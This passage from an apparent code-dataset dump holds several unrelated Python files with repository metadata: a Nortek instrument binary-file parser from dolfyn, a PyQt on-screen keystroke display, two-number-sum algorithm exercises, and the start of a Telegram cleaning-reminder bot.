np.array(tmp[20:23])\n cfg_u['diagnotics_interval'] = tmp[23]\n Mode0 = _int2binarray(tmp[24], 16)\n cfg_u['user_soundspeed_adj_factor'] = tmp[25]\n cfg_u['n_samples_diag'] = tmp[26]\n cfg_u['n_beams_cells_diag'] = tmp[27]\n cfg_u['n_pings_diag_wave'] = tmp[28]\n ModeTest = _int2binarray(tmp[29], 16)\n cfg_u['usr']['analog_in'] = tmp[30]\n sfw_ver = str(tmp[31])\n cfg_u['usr']['software_version'] = sfw_ver[0] + \\\n '.'+sfw_ver[1:3]+'.'+sfw_ver[3:]\n cfg_u['usr']['salinity'] = tmp[32]/10\n cfg_u['VelAdjTable'] = np.array(tmp[33:123])\n cfg_u['usr']['comments'] = tmp[123].partition(b'\\x00')[\n 0].decode('utf-8')\n cfg_u['awac']['wave_processing_method'] = [\n 'PUV', 'SUV', 'MLM', 'MLMST', 'None'][tmp[124]]\n Mode1 = _int2binarray(tmp[125], 16)\n cfg_u['awac']['prc_dyn_wave_cell_pos'] = int(tmp[126]/32767 * 100)\n cfg_u['wave_transmit_pulse'] = tmp[127]\n cfg_u['wave_blank_dist'] = tmp[128]\n cfg_u['awac']['wave_cell_size'] = tmp[129]\n cfg_u['awac']['n_samples_wave'] = tmp[130]\n cfg_u['n_burst'] = tmp[131]\n cfg_u['analog_out_scale'] = tmp[132]\n cfg_u['corr_thresh'] = tmp[133]\n cfg_u['transmit_pulse_lag2'] = tmp[134] # counts\n cfg_u['QualConst'] = np.array(tmp[135:143])\n self.checksum(byts)\n cfg_u['usr']['user_specified_sound_speed'] = str(Mode0[0])\n cfg_u['awac']['wave_mode'] = ['Disabled', 'Enabled'][int(Mode0[1])]\n cfg_u['usr']['analog_output'] = str(Mode0[2])\n cfg_u['usr']['output_format'] = ['Vector', 'ADV'][int(Mode0[3])] # noqa\n cfg_u['vel_scale_mm'] = [1, 0.1][int(Mode0[4])]\n cfg_u['usr']['serial_output'] = str(Mode0[5])\n cfg_u['reserved_EasyQ'] = str(Mode0[6])\n cfg_u['usr']['power_output_analog'] = str(Mode0[8])\n cfg_u['mode_test_use_DSP'] = str(ModeTest[0])\n cfg_u['mode_test_filter_output'] = ['total', 'correction_only'][int(ModeTest[1])] # noqa\n cfg_u['awac']['wave_fs'] = ['1 Hz', '2 Hz'][int(Mode1[0])]\n cfg_u['awac']['wave_cell_position'] = ['fixed', 'dynamic'][int(Mode1[1])] # noqa\n cfg_u['awac']['type_wave_cell_pos'] = ['pct_of_mean_pressure', 'pct_of_min_re'][int(Mode1[2])] # noqa\n\n def read_head_cfg(self,):\n # ID: '0x04 = 04\n if self.debug:\n logging.info('Reading head configuration (0x04) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg = self.config\n cfg['head'] = {}\n byts = self.read(220)\n tmp = unpack(self.endian + '2x3H12s176s22sH', byts)\n head_config = _int2binarray(tmp[0], 16).astype(int)\n cfg['head']['pressure_sensor'] = ['no', 'yes'][head_config[0]]\n cfg['head']['compass'] = ['no', 'yes'][head_config[1]]\n cfg['head']['tilt_sensor'] = ['no', 'yes'][head_config[2]]\n cfg['head']['carrier_freq_kHz'] = tmp[1]\n cfg['beam2inst_orientmat'] = np.array(\n unpack(self.endian + '9h', tmp[4][8:26])).reshape(3, 3) / 4096.\n self.checksum(byts)\n\n def read_hw_cfg(self,):\n # ID 0x05 = 05\n if self.debug:\n logging.info('Reading hardware configuration (0x05) ping #{} @ {}...'\n .format(self.c, self.pos))\n cfg_hw = self.config\n cfg_hw['hdw'] = {}\n byts = self.read(44)\n tmp = unpack(self.endian + '2x14s6H12x4s', byts)\n cfg_hw['hdw']['serial_number'] = tmp[0][:8].decode('utf-8')\n cfg_hw['ProLogID'] = unpack('B', tmp[0][8:9])[0]\n cfg_hw['hdw']['ProLogFWver'] = tmp[0][10:].decode('utf-8')\n cfg_hw['board_config'] = tmp[1]\n cfg_hw['board_freq'] = tmp[2]\n cfg_hw['hdw']['PIC_version'] = tmp[3]\n cfg_hw['hdw']['hardware_rev'] = tmp[4]\n cfg_hw['hdw']['recorder_size_bytes'] = tmp[5] * 65536\n status = _int2binarray(tmp[6], 16).astype(int)\n cfg_hw['hdw']['vel_range'] = ['normal', 'high'][status[0]]\n cfg_hw['hdw']['firmware_version'] = 
tmp[7].decode('utf-8')\n self.checksum(byts)\n\n def rd_time(self, strng):\n \"\"\"Read the time from the first 6bytes of the input string.\n \"\"\"\n min, sec, day, hour, year, month = unpack('BBBBBB', strng[:6])\n return time.date2epoch(datetime(time._fullyear(_bcd2char(year)),\n _bcd2char(month),\n _bcd2char(day),\n _bcd2char(hour),\n _bcd2char(min),\n _bcd2char(sec)))[0]\n\n def _init_data(self, vardict):\n \"\"\"Initialize the data object according to vardict.\n\n Parameters\n ----------\n vardict : (dict of :class:``)\n The variable definitions in the :class:`` specify\n how to initialize each data variable.\n \"\"\"\n\n shape_args = {'n': self.n_samp_guess}\n try:\n shape_args['nbins'] = self.config['usr']['n_bins']\n except KeyError:\n pass\n for nm, va in list(vardict.items()):\n if va.group is None:\n # These have to stay separated.\n if nm not in self.data:\n self.data[nm] = va._empty_array(**shape_args)\n else:\n if nm not in self.data[va.group]:\n self.data[va.group][nm] = va._empty_array(**shape_args)\n self.data['units'][nm] = va.units\n self.data['long_name'][nm] = va.long_name\n self.data['standard_name'][nm] = va.standard_name\n\n def read_vec_data(self,):\n # ID: 0x10 = 16\n c = self.c\n dat = self.data\n if self.debug:\n logging.info('Reading vector velocity data (0x10) ping #{} @ {}...'\n .format(self.c, self.pos))\n\n if 'vel' not in dat['data_vars']:\n self._init_data(nortek_defs.vec_data)\n self._dtypes += ['vec_data']\n\n byts = self.read(20)\n ds = dat['sys']\n dv = dat['data_vars']\n (ds['AnaIn2LSB'][c],\n ds['Count'][c],\n dv['PressureMSB'][c],\n ds['AnaIn2MSB'][c],\n dv['PressureLSW'][c],\n ds['AnaIn1'][c],\n dv['vel'][0, c],\n dv['vel'][1, c],\n dv['vel'][2, c],\n dv['amp'][0, c],\n dv['amp'][1, c],\n dv['amp'][2, c],\n dv['corr'][0, c],\n dv['corr'][1, c],\n dv['corr'][2, c]) = unpack(self.endian + '4B2H3h6B', byts)\n\n self.checksum(byts)\n self.c += 1\n\n def read_vec_checkdata(self,):\n # ID: 0x07 = 07\n if self.debug:\n logging.info('Reading vector check data (0x07) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts0 = self.read(6)\n checknow = {}\n tmp = unpack(self.endian + '2x2H', byts0) # The first two are size.\n checknow['Samples'] = tmp[0]\n n = checknow['Samples']\n checknow['First_samp'] = tmp[1]\n checknow['Amp1'] = tbx._nans(n, dtype=np.uint8) + 8\n checknow['Amp2'] = tbx._nans(n, dtype=np.uint8) + 8\n checknow['Amp3'] = tbx._nans(n, dtype=np.uint8) + 8\n byts1 = self.read(3 * n)\n tmp = unpack(self.endian + (3 * n * 'B'), byts1)\n for idx, nm in enumerate(['Amp1', 'Amp2', 'Amp3']):\n checknow[nm] = np.array(tmp[idx * n:(idx + 1) * n], dtype=np.uint8)\n self.checksum(byts0 + byts1)\n if 'checkdata' not in self.config:\n self.config['checkdata'] = checknow\n else:\n if not isinstance(self.config['checkdata'], list):\n self.config['checkdata'] = [self.config['checkdata']]\n self.config['checkdata'] += [checknow]\n\n def _sci_data(self, vardict):\n \"\"\"Convert the data to scientific units accordint to vardict.\n\n Parameters\n ----------\n vardict : (dict of :class:``)\n The variable definitions in the :class:`` specify\n how to scale each data variable.\n\n \"\"\"\n for nm, vd in list(vardict.items()):\n if vd.group is None:\n dat = self.data\n else:\n dat = self.data[vd.group]\n retval = vd.sci_func(dat[nm])\n # This checks whether a new data object was created:\n # sci_func returns None if it modifies the existing data.\n if retval is not None:\n dat[nm] = retval\n\n def sci_vec_data(self,):\n self._sci_data(nortek_defs.vec_data)\n dat = 
self.data\n\n dat['data_vars']['pressure'] = (\n dat['data_vars']['PressureMSB'].astype('float32') * 65536 +\n dat['data_vars']['PressureLSW'].astype('float32')) / 1000.\n dat['units']['pressure'] = 'dbar'\n dat['long_name']['pressure'] = 'Pressure'\n dat['standard_name']['pressure'] = 'sea_water_pressure'\n\n dat['data_vars'].pop('PressureMSB')\n dat['data_vars'].pop('PressureLSW')\n\n # Apply velocity scaling (1 or 0.1)\n dat['data_vars']['vel'] *= self.config['vel_scale_mm']\n\n def read_vec_hdr(self,):\n # ID: '0x12 = 18\n if self.debug:\n logging.info('Reading vector header data (0x12) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts = self.read(38)\n # The first two are size, the next 6 are time.\n tmp = unpack(self.endian + '8xH7B21x', byts)\n hdrnow = {}\n hdrnow['time'] = self.rd_time(byts[2:8])\n hdrnow['NRecords'] = tmp[0]\n hdrnow['Noise1'] = tmp[1]\n hdrnow['Noise2'] = tmp[2]\n hdrnow['Noise3'] = tmp[3]\n hdrnow['Spare0'] = byts[13:14].decode('utf-8')\n hdrnow['Corr1'] = tmp[5]\n hdrnow['Corr2'] = tmp[6]\n hdrnow['Corr3'] = tmp[7]\n hdrnow['Spare1'] = byts[17:].decode('utf-8')\n self.checksum(byts)\n if 'data_header' not in self.config:\n self.config['data_header'] = hdrnow\n else:\n if not isinstance(self.config['data_header'], list):\n self.config['data_header'] = [self.config['data_header']]\n self.config['data_header'] += [hdrnow]\n\n def read_vec_sysdata(self,):\n # ID: 0x11 = 17\n c = self.c\n if self.debug:\n logging.info('Reading vector system data (0x11) ping #{} @ {}...'\n .format(self.c, self.pos))\n dat = self.data\n if self._lastread[:2] == ['vec_checkdata', 'vec_hdr', ]:\n self.burst_start[c] = True\n if 'time' not in dat['coords']:\n self._init_data(nortek_defs.vec_sysdata)\n self._dtypes += ['vec_sysdata']\n byts = self.read(24)\n # The first two are size (skip them).\n dat['coords']['time'][c] = self.rd_time(byts[2:8])\n ds = dat['sys']\n dv = dat['data_vars']\n (dv['batt'][c],\n dv['c_sound'][c],\n dv['heading'][c],\n dv['pitch'][c],\n dv['roll'][c],\n dv['temp'][c],\n dv['error'][c],\n dv['status'][c],\n ds['AnaIn'][c]) = unpack(self.endian + '2H3hH2BH', byts[8:])\n self.checksum(byts)\n\n def sci_vec_sysdata(self,):\n \"\"\"Translate the data in the vec_sysdata structure into\n scientific units.\n \"\"\"\n dat = self.data\n fs = dat['attrs']['fs']\n self._sci_data(nortek_defs.vec_sysdata)\n t = dat['coords']['time']\n dv = dat['data_vars']\n dat['sys']['_sysi'] = ~np.isnan(t)\n # These are the indices in the sysdata variables\n # that are not interpolated.\n nburst = self.config['n_burst']\n dv['orientation_down'] = tbx._nans(len(t), dtype='bool')\n if nburst == 0:\n num_bursts = 1\n nburst = len(t)\n else:\n num_bursts = int(len(t) // nburst + 1)\n for nb in range(num_bursts):\n iburst = slice(nb * nburst, (nb + 1) * nburst)\n sysi = dat['sys']['_sysi'][iburst]\n if len(sysi) == 0:\n break\n # Skip the first entry for the interpolation process\n inds = np.nonzero(sysi)[0][1:]\n arng = np.arange(len(t[iburst]), dtype=np.float64)\n if len(inds) >= 2:\n p = np.poly1d(np.polyfit(inds, t[iburst][inds], 1))\n t[iburst] = p(arng)\n elif len(inds) == 1:\n t[iburst] = ((arng - inds[0]) / (fs * 3600 * 24) +\n t[iburst][inds[0]])\n else:\n t[iburst] = (t[iburst][0] + arng / (fs * 24 * 3600))\n\n tmpd = tbx._nans_like(dv['heading'][iburst])\n # The first status bit should be the orientation.\n tmpd[sysi] = dv['status'][iburst][sysi] & 1\n tbx.fillgaps(tmpd, extrapFlg=True)\n tmpd = np.nan_to_num(tmpd, nan=0) # nans in pitch roll heading\n slope = np.diff(tmpd)\n 
tmpd[1:][slope < 0] = 1\n tmpd[:-1][slope > 0] = 0\n dv['orientation_down'][iburst] = tmpd.astype('bool')\n tbx.interpgaps(dv['batt'], t)\n tbx.interpgaps(dv['c_sound'], t)\n tbx.interpgaps(dv['heading'], t)\n tbx.interpgaps(dv['pitch'], t)\n tbx.interpgaps(dv['roll'], t)\n tbx.interpgaps(dv['temp'], t)\n\n def read_microstrain(self,):\n \"\"\"Read ADV microstrain sensor (IMU) data\n \"\"\"\n def update_defs(dat, mag=False, orientmat=False):\n imu_data = {'accel': ['m s-2', 'Acceleration', 'platform_acceleration'],\n 'angrt': ['rad s-1', 'Angular Velocity', 'platform_angular_velocity'],\n 'mag': ['gauss', 'Compass', 'magnetic_field_vector'],\n 'orientmat': ['1', 'Orientation Matrix', '']}\n for ky in imu_data:\n dat['units'].update({ky: imu_data[ky][0]})\n dat['long_name'].update({ky: imu_data[ky][1]})\n dat['standard_name'].update({ky: imu_data[ky][2]})\n if not mag:\n dat['units'].pop('mag')\n dat['long_name'].pop('mag')\n dat['standard_name'].pop('mag')\n if not orientmat:\n dat['units'].pop('orientmat')\n dat['long_name'].pop('orientmat')\n dat['standard_name'].pop('orientmat')\n\n # 0x71 = 113\n if self.c == 0:\n logging.warning('First \"microstrain data\" block '\n 'is before first \"vector system data\" block.')\n else:\n self.c -= 1\n if self.debug:\n logging.info('Reading vector microstrain data (0x71) ping #{} @ {}...'\n .format(self.c, self.pos))\n byts0 = self.read(4)\n # The first 2 are the size, 3rd is count, 4th is the id.\n ahrsid = unpack(self.endian + '3xB', byts0)[0]\n if hasattr(self, '_ahrsid') and self._ahrsid != ahrsid:\n logging.warning('AHRS_ID changes mid-file!')\n\n if ahrsid in [195, 204, 210, 211]:\n self._ahrsid = ahrsid\n\n c = self.c\n dat = self.data\n dv = dat['data_vars']\n da = dat['attrs']\n da['has_imu'] = 1 # logical\n if 'accel' not in dv:\n self._dtypes += ['microstrain']\n if ahrsid == 195:\n self._orient_dnames = ['accel', 'angrt', 'orientmat']\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['orientmat'] = tbx._nans((3, 3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['accel', 'angrt']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n update_defs(dat, mag=False, orientmat=True)\n\n if ahrsid in [204, 210]:\n self._orient_dnames = ['accel', 'angrt', 'mag', 'orientmat']\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['mag'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['accel', 'angrt', 'mag']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n if ahrsid == 204:\n dv['orientmat'] = tbx._nans((3, 3, self.n_samp_guess),\n dtype=np.float32)\n update_defs(dat, mag=True, orientmat=True)\n\n if ahrsid == 211:\n self._orient_dnames = ['angrt', 'accel', 'mag']\n dv['angrt'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['accel'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n dv['mag'] = tbx._nans((3, self.n_samp_guess),\n dtype=np.float32)\n rv = ['angrt', 'accel', 'mag']\n if not all(x in da['rotate_vars'] for x in rv):\n da['rotate_vars'].extend(rv)\n update_defs(dat, mag=True, orientmat=False)\n\n byts = ''\n if ahrsid == 195: # 0xc3\n byts = self.read(64)\n dt = unpack(self.endian + '6f9f4x', byts)\n (dv['angrt'][:, c],\n dv['accel'][:, c]) = (dt[0:3], dt[3:6],)\n dv['orientmat'][:, :, c] = ((dt[6:9], dt[9:12], dt[12:15]))\n elif ahrsid == 204: # 0xcc\n 
byts = self.read(78)\n # This skips the \"DWORD\" (4 bytes) and the AHRS checksum\n # (2 bytes)\n dt = unpack(self.endian + '18f6x', byts)\n (dv['accel'][:, c],\n dv['angrt'][:, c],\n dv['mag'][:, c]) = (dt[0:3], dt[3:6], dt[6:9],)\n dv['orientmat'][:, :, c] = ((dt[9:12], dt[12:15], dt[15:18]))\n elif ahrsid == 211:\n byts = self.read(42)\n dt = unpack(self.endian + '9f6x', byts)\n (dv['angrt'][:, c],\n dv['accel'][:, c],\n dv['mag'][:, c]) = (dt[0:3], dt[3:6], dt[6:9],)\n else:\n logging.warning('Unrecognized IMU identifier: ' + str(ahrsid))\n self.f.seek(-2, 1)\n return 10\n self.checksum(byts0 + byts)\n self.c += 1 # reset the increment\n\n def sci_microstrain(self,):\n \"\"\"Rotate orientation data into ADV coordinate system.\n \"\"\"\n # MS = MicroStrain\n dv = self.data['data_vars']\n for nm in self._orient_dnames:\n # Rotate the MS orientation data (in MS coordinate system)\n # to be consistent with the ADV coordinate system.\n # (x,y,-z)_ms = (z,y,x)_adv\n (dv[nm][2],\n dv[nm][0]) = (dv[nm][0],\n -dv[nm][2].copy())\n if 'orientmat' in self._orient_dnames:\n # MS coordinate system is in North-East-Down (NED),\n # we want East-North-Up (ENU)\n dv['orientmat'][:, 2] *= -1\n (dv['orientmat'][:, 0],\n dv['orientmat'][:, 1]) = (dv['orientmat'][:, 1],\n dv['orientmat'][:, 0].copy())\n if 'accel' in dv:\n # This value comes from the MS 3DM-GX3 MIP manual\n dv['accel'] *= 9.80665\n if self._ahrsid in [195, 211]:\n # These are DAng and DVel, so we convert them to angrt, accel here\n dv['angrt'] *= self.config['fs']\n dv['accel'] *= self.config['fs']\n\n def read_awac_profile(self,):\n # ID: '0x20' = 32\n dat = self.data\n if self.debug:\n logging.info('Reading AWAC velocity data (0x20) ping #{} @ {}...'\n .format(self.c, self.pos))\n nbins = self.config['usr']['n_bins']\n if 'temp' not in dat['data_vars']:\n self._init_data(nortek_defs.awac_profile)\n self._dtypes += ['awac_profile']\n\n # Note: docs state there is 'fill' byte at the end, if nbins is odd,\n # but doesn't appear to be the case\n n = self.config['usr']['n_beams']\n byts = self.read(116 + n*3 * nbins)\n c = self.c\n dat['coords']['time'][c] = self.rd_time(byts[2:8])\n ds = dat['sys']\n dv = dat['data_vars']\n (dv['error'][c],\n ds['AnaIn1'][c],\n dv['batt'][c],\n dv['c_sound'][c],\n dv['heading'][c],\n dv['pitch'][c],\n dv['roll'][c],\n p_msb,\n dv['status'][c],\n p_lsw,\n dv['temp'][c],) = unpack(self.endian + '7HBB2H', byts[8:28])\n dv['pressure'][c] = (65536 * p_msb + p_lsw)\n # The nortek system integrator manual specifies an 88byte 'spare'\n # field, therefore we start at 116.\n tmp = unpack(self.endian + str(n * nbins) + 'h' +\n str(n * nbins) + 'B', byts[116:116 + n*3 * nbins])\n for idx in range(n):\n dv['vel'][idx, :, c] = tmp[idx * nbins: (idx + 1) * nbins]\n dv['amp'][idx, :, c] = tmp[(idx + n) * nbins: (idx + n+1) * nbins]\n self.checksum(byts)\n self.c += 1\n\n def sci_awac_profile(self,):\n self._sci_data(nortek_defs.awac_profile)\n # Calculate the ranges.\n cs_coefs = {2000: 0.0239,\n 1000: 0.0478,\n 600: 0.0797,\n 400: 0.1195}\n h_ang = 25 * (np.pi / 180) # Head angle is 25 degrees for all awacs.\n # Cell size\n cs = round(float(self.config['bin_length']) / 256. 
*\n cs_coefs[self.config['head']['carrier_freq_kHz']] * np.cos(h_ang), ndigits=2)\n # Blanking distance\n bd = round(self.config['blank_dist'] *\n 0.0229 * np.cos(h_ang) - cs, ndigits=2)\n\n r = (np.float32(np.arange(self.config['usr']['n_bins']))+1)*cs + bd\n self.data['coords']['range'] = r\n self.data['attrs']['cell_size'] = cs\n self.data['attrs']['blank_dist'] = bd\n\n def dat2sci(self,):\n for nm in self._dtypes:\n getattr(self, 'sci_' + nm)()\n for nm in ['data_header', 'checkdata']:\n if nm in self.config and isinstance(self.config[nm], list):\n self.config[nm] = _recatenate(self.config[nm])\n\n def __exit__(self, type, value, trace):\n self.close()\n\n def __enter__(self):\n return self\n\n\ndef _crop_data(obj, range, n_lastdim):\n for nm, dat in obj.items():\n if isinstance(dat, np.ndarray) and (dat.shape[-1] == n_lastdim):\n obj[nm] = dat[..., range]\n\n\ndef _recatenate(obj):\n out = type(obj[0])()\n for ky in list(obj[0].keys()):\n if ky in ['__data_groups__', '_type']:\n continue\n val0 = obj[0][ky]\n if isinstance(val0, np.ndarray) and val0.size > 1:\n out[ky] = np.concatenate([val[ky][..., None] for val in obj],\n axis=-1)\n else:\n out[ky] = np.array([val[ky] for val in obj])\n return out\n","repo_name":"lkilcher/dolfyn","sub_path":"dolfyn/io/nortek.py","file_name":"nortek.py","file_ext":"py","file_size_in_byte":41729,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"32"} +{"seq_id":"26382399048","text":"#!/usr/bin/env python3\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import QPalette, QColor, QFont\nfrom PyQt5.QtWidgets import *\nimport keyboard, mouse\n\n# ---- ColorSchemes\n# Human Readable ColorSchemes\n# scheme_name = [background, foreground]\nzi_dark = [\"2F3640\", \"ffffff\"] # normal\nzi_darkP = [\"37B0FF\", \"ffffff\"] # pressed\n\n# Readable Color by the codes\ncolorscheme = str(\"* {background:\" + \"#\" + str(zi_dark[0]) + \"; color: \" + \"#\" + str(zi_dark[1]) + \"}\")\ncolorscheme_pressed = str(\"* {background:\" + \"#\" + str(zi_darkP[0]) + \"; color: \" + \"#\" + str(zi_darkP[1]) + \"}\")\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(132, 132)\n Form.setStyleSheet(u\"* {background: #44BD32}\")\n font = QFont()\n font.setFamily(u\"Google Sans\")\n font.setBold(True)\n font.setWeight(75)\n self.lab_up = QLabel(Form)\n self.lab_up.setFont(font)\n self.lab_up.setGeometry(QRect(50, 15, 31, 31))\n self.lab_up.setStyleSheet(colorscheme)\n self.lab_up.setAlignment(Qt.AlignCenter)\n self.lab_up.setObjectName(\"lab_up\")\n self.lab_left = QLabel(Form)\n self.lab_left.setFont(font)\n self.lab_left.setGeometry(QRect(15, 50, 31, 31))\n self.lab_left.setStyleSheet(colorscheme)\n self.lab_left.setAlignment(Qt.AlignCenter)\n self.lab_left.setObjectName(\"lab_left\")\n self.lab_down = QLabel(Form)\n self.lab_down.setFont(font)\n self.lab_down.setGeometry(QRect(50, 50, 31, 31))\n self.lab_down.setStyleSheet(colorscheme)\n self.lab_down.setAlignment(Qt.AlignCenter)\n self.lab_down.setObjectName(\"lab_down\")\n self.lab_right = QLabel(Form)\n self.lab_right.setFont(font)\n self.lab_right.setGeometry(QRect(85, 50, 31, 31))\n self.lab_right.setStyleSheet(colorscheme)\n self.lab_right.setAlignment(Qt.AlignCenter)\n self.lab_right.setObjectName(\"lab_right\")\n self.lab_x = QLabel(Form)\n self.lab_x.setFont(font)\n self.lab_x.setObjectName(u\"lab_x\")\n self.lab_x.setGeometry(QRect(15, 85, 66, 31))\n self.lab_x.setStyleSheet(colorscheme)\n 
self.lab_x.setAlignment(Qt.AlignCenter)\n self.lab_c = QLabel(Form)\n self.lab_c.setFont(font)\n self.lab_c.setObjectName(u\"lab_c\")\n self.lab_c.setGeometry(QRect(85, 85, 31, 31))\n self.lab_c.setStyleSheet(colorscheme)\n self.lab_c.setAlignment(Qt.AlignCenter)\n\n self.retranslateUi(Form)\n QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QCoreApplication.translate\n Form.setWindowTitle(_translate(\"KeyStroke\", \"KeyStroke\"))\n self.lab_up.setText(_translate(\"Form\", \"↑\"))\n self.lab_left.setText(_translate(\"Form\", \"A\"))\n self.lab_down.setText(_translate(\"Form\", \"↓\"))\n self.lab_right.setText(_translate(\"Form\", \"D\"))\n self.lab_x.setText(_translate(\"Form\", \"X\"))\n self.lab_c.setText(_translate(\"Form\", \"C\"))\n\ndef release_up(f): \n ui.lab_up.setStyleSheet(str(colorscheme))\ndef pressed_up(f):\n ui.lab_up.setStyleSheet(str(colorscheme_pressed))\ndef release_down(f): \n ui.lab_down.setStyleSheet(str(colorscheme))\ndef pressed_down(f):\n ui.lab_down.setStyleSheet(str(colorscheme_pressed))\ndef release_a(f): \n ui.lab_left.setStyleSheet(str(colorscheme))\ndef pressed_a(f):\n ui.lab_left.setStyleSheet(str(colorscheme_pressed))\ndef release_d(f): \n ui.lab_right.setStyleSheet(str(colorscheme))\ndef pressed_d(f):\n ui.lab_right.setStyleSheet(str(colorscheme_pressed))\ndef release_x(f): \n ui.lab_x.setStyleSheet(str(colorscheme))\ndef pressed_x(f):\n ui.lab_x.setStyleSheet(str(colorscheme_pressed))\ndef release_c(f): \n ui.lab_c.setStyleSheet(str(colorscheme))\ndef pressed_c(f):\n ui.lab_c.setStyleSheet(str(colorscheme_pressed))\n\n# ---- Init\napp = QApplication(sys.argv)\nwindow = QWidget()\nui = Ui_Form()\nui.setupUi(window)\n\n# ---- Hotkeys\n# keyboard.add_hotkey('a', set_style_bgwhite) ---- This is a test\nkeyboard.on_press_key('up',pressed_up)\nkeyboard.on_release_key('up',release_up)\nkeyboard.on_press_key('down',pressed_down)\nkeyboard.on_release_key('down',release_down)\nkeyboard.on_press_key('a',pressed_a)\nkeyboard.on_release_key('a',release_a)\nkeyboard.on_press_key('d',pressed_d)\nkeyboard.on_release_key('d',release_d)\nkeyboard.on_press_key('c',pressed_c)\nkeyboard.on_release_key('c',release_c)\nkeyboard.on_press_key('x',pressed_x)\nkeyboard.on_release_key('x',release_x)\n\n# ---- Launch Window\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"null2264/Simple-KeyStroke","sub_path":"keystroke.py","file_name":"keystroke.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17748714930","text":"def twoNumberSum_1(array, targetSum):\n # Time=O(0^2n) as two loops\n # Space=O(1)\n for i in range(len(array) - 1): # all way before last\n first_num = array[i]\n for j in range(i + 1, len(array)): # all to the end\n if first_num + array[j] == targetSum:\n return [first_num, array[j]]\n return []\n\ndef twoNumberSum_2(array, targetSum):\n # Time=O(n) traversing only once\n # Space=O(n) because adding\n # better solution but takes space\n # check if number needed is stored in hash table\n numbers_hash = {} # will store already checked values\n for number in array:\n possibleMatch = targetSum - number\n if possibleMatch in numbers_hash:\n return [possibleMatch, number]\n else: # move one side only, checking what went through\n numbers_hash[number] = \"checked\"\n return []\n\ndef twoNumberSum_3(array, targetSum):\n # Good sorint algorithm is O(nlog(n))\n # Time is sorting algorithm plus iteration tjhe most one\n # Space=O(1)\n 
# Sort array and use the fact that sum if passed.\n # than will exceed target\n array.sort()\n left_idx = 0\n right_idx = len(array) - 1\n while left_idx < right_idx:\n currentSum = array[left_idx] + array[right_idx]\n if currentSum == targetSum:\n return [array[left_idx], array[right_idx]]\n elif currentSum < targetSum:\n # we move left index because we know that\n # if we move right index the sum will be even less\n left_idx += 1\n elif currentSum > targetSum:\n # we move the right index bacuse we know that \n # the number on the left will be smaller\n # hence the overall sum will be smaller\n right_idx -= 1\n return []\n\ndef test_case():\n func = twoNumberSum_2\n output = func([3, 5, -4, 8, 11, 1, -1, 6], 10)\n assert len(output) == 2\n assert 11 in output\n assert -1 in output\n print(\"test1 passed\")\n output = func([3, 5, -4, 8, 6, 1, -1, 11], 10)\n assert len(output) == 2\n assert 11 in output\n assert -1 in output\n print(\"test2 passed\")\n\nif __name__ == '__main__':\n test_case()\n","repo_name":"tszyrowski/tries-python","sub_path":"alex/twoNumberSum.py","file_name":"twoNumberSum.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43855183759","text":"\"\"\" Simple notify-by-schedule telegram bot\n\n- coding: utf-8 -\n\nEmail: yuva.phalle0@gmail.com\nWebsite: github.com/yuvaphalle\n\n\"\"\"\n\nimport time\nimport schedule\nimport datetime\nimport random\nimport os\nimport threading\nfrom datetime import timedelta\n\nimport telebot\nfrom telebot import apihelper\n\nimport botmessages as bmsg\n\nprint('I\\'m alive!')\ntoken = os.environ['TOKEN']\nchat_id = os.environ['CHAT_ID']\nprint('Env vars reading successful')\n\nfixed_date = datetime.datetime(2019, 4, 10)\nbot = telebot.TeleBot(token)\n\nclass CleaningReminder:\n def __init__(self, token, chat_id, start_date):\n self.bot = telebot.TeleBot(token)\n \n self.chat_id = chat_id\n self.start_date = start_date\n\n self.room_list_1 = ['Mohit', 'Khurshid' ,'Yuva']\n self.room_list_2 = ['Khurshid', 'Yuva' ,'Mohit']\n \n self.pinned_message_id = None\n\n def add_remind_time(self, remind_time):\n schedule.every().day.at(remind_time).do(self.__clean_reminder)\n\n def polling(self):\n thread = threading.Thread(target=self.__polling_loop)\n thread.start()\n\n def __clean_reminder(self):\n message = bmsg.clean_headers[random.randint(0, len(bmsg.clean_headers) - 1)]\n \n day_date = datetime.datetime.today()\n for i in range(7):\n room_first = self.room_list_1[(day_date - self.start_date).days % len(self.room_list_1)]\n room_second = self.room_list_2[(day_date - self.start_date).days % len(self.room_list_2)]\n message += bmsg.clean_body.format(day_date.strftime(\"%A\"), room_first, room_second)\n day_date += timedelta(days=1)\n \n message += bmsg.clean_hashtag\n \n message_info = self.bot.send_message(chat_id, message)\n \n if self.pinned_message_id is not None:\n self.bot.unpin_chat_message(chat_id, self.pinned_message_id)\n\n self.bot.pin_chat_message(chat_id, message_info.message_id)\n self.pinned_message_id = message_info.message_id\n\n\n def __polling_loop(self): \n while True:\n schedule.run_pending()\n time.sleep(1)\n \n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n bot.reply_to(message, bmsg.start + bmsg.hlp) \n\n\n@bot.message_handler(commands=['help'])\ndef handle_help(message):\n bot.reply_to(message, bmsg.hlp)\n\n\n@bot.message_handler(commands=['links'])\ndef handle_links(message):\n 
